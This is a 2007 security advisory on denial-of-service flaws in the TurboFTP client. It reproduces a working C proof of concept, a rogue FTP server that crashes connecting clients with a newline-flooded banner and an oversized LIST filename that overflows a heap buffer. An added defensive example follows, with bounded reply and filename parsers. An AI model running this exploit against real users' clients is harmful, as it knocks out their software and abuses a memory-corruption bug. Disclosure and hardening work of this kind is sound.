[EXPL] TurboFTP Multiple DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 21 Feb 2007 11:32:45 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
TurboFTP Multiple DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://www.turboftp.com/> TurboFTP is "a secure FTP client program
(supports FTP over SSL/TLS and SFTP over SSH2) for Windows
9x/ME/NT4/2000/XP/2003". Multiple vulnerabilities in TurboFTP allow a
remote attacker, acting as the FTP server the client connects to, to
crash the client.
DETAILS
Exploit:
/****************************************
 * TurboFTP 5.30 Build 572 Multiple Remote DoS
 *
 * Several vulnerabilities have been discovered in TurboFTP
 *
 * 1) The app does not correctly handle responses that contain 7000 newline chars
 * 2) There is a heap overflow triggered by a long file name in a response to a LIST command
 * 3) There is a heap overflow when the app sends a long CWD command
 *
 * Usage: TurboFTPDoS mode, mode is 1 or 2
 *
 * Only a DoS, I don't think code execution is possible
 *
 * Have Fun!
 *
 * Coded by Marsu <Marsupilamipowa@xxxxxxxxxx>
 *****************************************/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

/* send a NUL-terminated reply on the control or data connection */
static void sendstr(SOCKET s, const char *msg)
{
    if (send(s, msg, (int)strlen(msg), 0) == SOCKET_ERROR)
    {
        printf("[-] Error in send!\n");
        exit(-1);
    }
}

/* read one client command into buf (always NUL-terminated) and echo it */
static void readcmd(SOCKET s, char *buf, int sz)
{
    memset(buf, '\0', sz);
    if (recv(s, buf, sz - 1, 0) > 0)
        printf("%s", buf);
}

int main(int argc, char *argv[])
{
    char recvbuff[1024];
    char evilbuff[30000];
    /* hard-coded LIST entry prefix; the name field is padded with 'A's below
     * (the original copied 58 bytes here, more than this literal holds) */
    const char listprefix[] = "-rw-rw-rw- 1 ftp ftp 1777 Jan 30 12:14 T";
    struct sockaddr_in sin, sin2;
    SOCKET server, client, ListenSock, DATAClient;
    int mode;
    int len = 700;
    WSADATA wsaData;

    WSAStartup(MAKEWORD(1, 1), &wsaData);
    server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    sin.sin_family = PF_INET;
    sin.sin_addr.s_addr = htonl(INADDR_ANY);
    sin.sin_port = htons(21);
    bind(server, (SOCKADDR *)&sin, sizeof(sin));
    printf("[+] TurboFTP 5.30 Build 572 Multiple Remote DoS\n");
    printf("[+] Coded and discovered by Marsu <Marsupilamipowa@xxxxxxxxxx>\n");
    if (argc < 2)
    {
        printf("[+] Usage: %s mode, mode is 1 or 2\n", argv[0]);
        return 0;
    }
    mode = atoi(argv[1]);
    printf("[*] Listening on port 21 ...\n");
    listen(server, 5);
    printf("[*] Waiting for client ...\n");
    client = accept(server, NULL, NULL);
    printf("[+] Client connected\n");

    //Banner: mode 1 sends a 7000-byte reply made almost entirely of newline bytes (bug 1)
    if (mode == 1)
    {
        memset(evilbuff, 10, 7000);
        memcpy(evilbuff, "220 Hello there", 15);
        memcpy(evilbuff + 7000, "\r\n\0", 3);
        sendstr(client, evilbuff);
    }
    else
        sendstr(client, "220 Hello there\r\n");
    //USER
    readcmd(client, recvbuff, sizeof(recvbuff));
    if (mode == 1)
    {
        memset(evilbuff, 10, 7000);
        memcpy(evilbuff, "331 ", 4);
        memcpy(evilbuff + 7000, "\r\n\0", 3);
        sendstr(client, evilbuff);
        printf("[+] Waiting for a few seconds ...\n");
        Sleep(4000);
        printf("[+] Must be 100%% CPU consuming\n");
        return 0;
    }
    sendstr(client, "331 \r\n");
    //PASS
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "230 \r\n");
    //SYST
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "215 WINDOWS\r\n");
    //FEAT
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "211 END\r\n");
    //REST 100
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "350 rest at 100\r\n");
    //REST 0
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "350 rest at 0\r\n");
    //PWD
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "257 \"dir/\"\r\n");
    //TYPE A
    readcmd(client, recvbuff, sizeof(recvbuff));
    sendstr(client, "200 \r\n");
    //PASV: the data socket is bound and listening before the port is
    //announced, so the client cannot connect before it is ready
    readcmd(client, recvbuff, sizeof(recvbuff));
    ListenSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    sin2.sin_family = AF_INET;
    sin2.sin_addr.s_addr = htonl(INADDR_ANY);
    sin2.sin_port = htons(10240);
    bind(ListenSock, (SOCKADDR *)&sin2, sizeof(sin2));
    listen(ListenSock, 5);
    sendstr(client, "227 Entering Passive Mode (127,0,0,1,40,0)\r\n");
    //127.0.0.1:10240 (40*256+0)
    printf("[*] Waiting for data connection ...\n");
    DATAClient = accept(ListenSock, NULL, NULL);
    printf("[+] Client connected\n");
    //LIST: one directory entry whose file name is several hundred 'A' bytes (bug 2)
    readcmd(client, recvbuff, sizeof(recvbuff));
    memset(evilbuff, 'A', len);
    memcpy(evilbuff, listprefix, sizeof(listprefix) - 1);
    memcpy(evilbuff + len, "\r\n\0", 3);
    sendstr(DATAClient, evilbuff);
    //Close control connection
    sendstr(client, "150 Opening data connection for directory list.\r\n");
    sendstr(client, "226 OK\r\n");
    closesocket(DATAClient);
    printf("[+] Evil list sent\n");
    closesocket(client);
    closesocket(server); //bug is triggered there
    printf("[+] TurboFTP is out\n");
    WSACleanup();
    return 0;
}
// milw0rm.com [2007-02-20]
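Both inputs the PoC abuses, a control-channel reply stuffed with newline bytes and a LIST entry with an oversized name, are the same defect seen from the client side: server-supplied data is copied or buffered without a length check. The following is an added example written for this page, not code from the advisory, from Marsu's exploit or from TurboFTP: a bounded reply parser and a bounded LIST-name extractor of the kind a hardened client would use. The caps FTP_MAX_LINE and FTP_MAX_REPLY, the function names and the constructed inputs in the check functions are all assumptions.

```c
/* Added example, not part of the advisory or of the exploit code above.
 * Limits, names and the constructed inputs are assumptions. */
#include <ctype.h>
#include <string.h>

#define FTP_MAX_LINE  1024  /* assumed cap on one reply line, CRLF included */
#define FTP_MAX_REPLY 8192  /* assumed cap on a whole multi-line reply */

enum ftp_parse {
    FTP_OK = 0,      /* one complete reply parsed; *code and *consumed set */
    FTP_INCOMPLETE,  /* more bytes needed before a decision is possible */
    FTP_TOO_LONG,    /* a line or reply exceeded a cap: drop the connection */
    FTP_MALFORMED    /* no "ddd " / "ddd-" where the protocol requires one */
};

/* 3-digit reply code at the start of p, or -1 if there is none */
static int reply_code(const char *p, size_t n)
{
    if (n < 4 || !isdigit((unsigned char)p[0]) || !isdigit((unsigned char)p[1])
              || !isdigit((unsigned char)p[2]))
        return -1;
    return (p[0] - '0') * 100 + (p[1] - '0') * 10 + (p[2] - '0');
}

/* Parse one RFC 959 reply (single- or multi-line) from buf[0..len).
 * Every line is length-checked before it is interpreted, so thousands of
 * bare newlines or a kilobyte-long line are refused, never buffered. */
enum ftp_parse ftp_parse_reply(const char *buf, size_t len, int *code, size_t *consumed)
{
    size_t pos = 0;
    int first = -1;
    for (;;) {
        const char *line = buf + pos;
        const char *lf = memchr(line, '\n', len - pos);
        size_t linelen;
        if (lf == NULL)
            return (len - pos >= FTP_MAX_LINE) ? FTP_TOO_LONG : FTP_INCOMPLETE;
        linelen = (size_t)(lf - line) + 1;
        if (linelen > FTP_MAX_LINE || pos + linelen > FTP_MAX_REPLY)
            return FTP_TOO_LONG;
        pos += linelen;
        if (first < 0) {                          /* first line of the reply */
            first = reply_code(line, linelen);
            if (first < 0 || (line[3] != ' ' && line[3] != '-'))
                return FTP_MALFORMED;
            if (line[3] == ' ') { *code = first; *consumed = pos; return FTP_OK; }
            continue;                             /* "ddd-" opens a multi-line reply */
        }
        /* continuation lines end at a "ddd " line carrying the same code */
        if (reply_code(line, linelen) == first && line[3] == ' ') {
            *code = first; *consumed = pos; return FTP_OK;
        }
    }
}

/* Code of a complete reply string, or -1 if the parser rejects it. */
int parsed_code(const char *s)
{
    int code = 0; size_t used = 0;
    return ftp_parse_reply(s, strlen(s), &code, &used) == FTP_OK ? code : -1;
}

/* Copy the name field of a Unix-style LIST line into a fixed buffer.
 * Returns 0 on success, -1 if the line is malformed or the name would not
 * fit; the caller skips the entry instead of overflowing its buffer. */
int list_entry_name(const char *line, size_t linelen, char *name, size_t namesz)
{
    size_t i = 0, end = linelen, field;
    for (field = 0; field < 8; field++) {   /* mode links owner group size mon day time */
        while (i < linelen && line[i] != ' ') i++;
        while (i < linelen && line[i] == ' ') i++;
        if (i >= linelen) return -1;
    }
    while (end > i && (line[end - 1] == '\r' || line[end - 1] == '\n')) end--;
    if (end - i >= namesz) return -1;       /* an unchecked copy here is the bug */
    memcpy(name, line + i, end - i);
    name[end - i] = '\0';
    return 0;
}

/* Constructed inputs shaped like the PoC's traffic (not captured from it).
 * Each check returns 1 when the hardened parser behaves as intended. */
int check_reply_limits(void)
{
    static char blob[7002], line[2000];
    int code = 0; size_t used = 0;
    enum ftp_parse a, b, c;
    memset(blob, '\n', sizeof blob);            /* mode 1: banner + 7000 newlines */
    memcpy(blob, "220 Hello there", 15);
    memcpy(blob + 7000, "\r\n", 2);
    a = ftp_parse_reply(blob, sizeof blob, &code, &used);              /* banner ok */
    b = ftp_parse_reply(blob + used, sizeof blob - used, &code, &used); /* rest refused */
    memset(line, 'x', sizeof line);             /* one 2000-byte line, no CRLF */
    c = ftp_parse_reply(line, sizeof line, &code, &used);
    return a == FTP_OK && code == 220 && b == FTP_MALFORMED && c == FTP_TOO_LONG;
}

int check_list_name(void)
{
    static char line[702];
    char name[256];
    const char *ok = "-rw-rw-rw- 1 ftp ftp 1777 Jan 30 12:14 readme.txt\r\n";
    memset(line, 'A', 700);                     /* mode 2: 700-byte LIST line */
    memcpy(line, "-rw-rw-rw- 1 ftp ftp 1777 Jan 30 12:14 ", 39);
    memcpy(line + 700, "\r\n", 2);
    return list_entry_name(line, sizeof line, name, sizeof name) == -1
        && list_entry_name(ok, strlen(ok), name, sizeof name) == 0
        && strcmp(name, "readme.txt") == 0;
}
```

ftp_parse_reply returns FTP_TOO_LONG for a line or reply over the cap and FTP_MALFORMED for bytes that do not begin with a reply code; on either result a client should close the control connection rather than keep reading. check_reply_limits feeds it the mode-1 banner shape (the greeting is accepted, the trailing newlines are refused as malformed) plus an unterminated 2000-byte line, and check_list_name feeds list_entry_name the mode-2 LIST line, which is skipped because its name does not fit the 256-byte buffer.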
ADDITIONAL INFORMATION
The information has been provided by Marsu <Marsupilamipowa@xxxxxxxxxx>.
The original article can be found at:
http://www.milw0rm.com/exploits/3341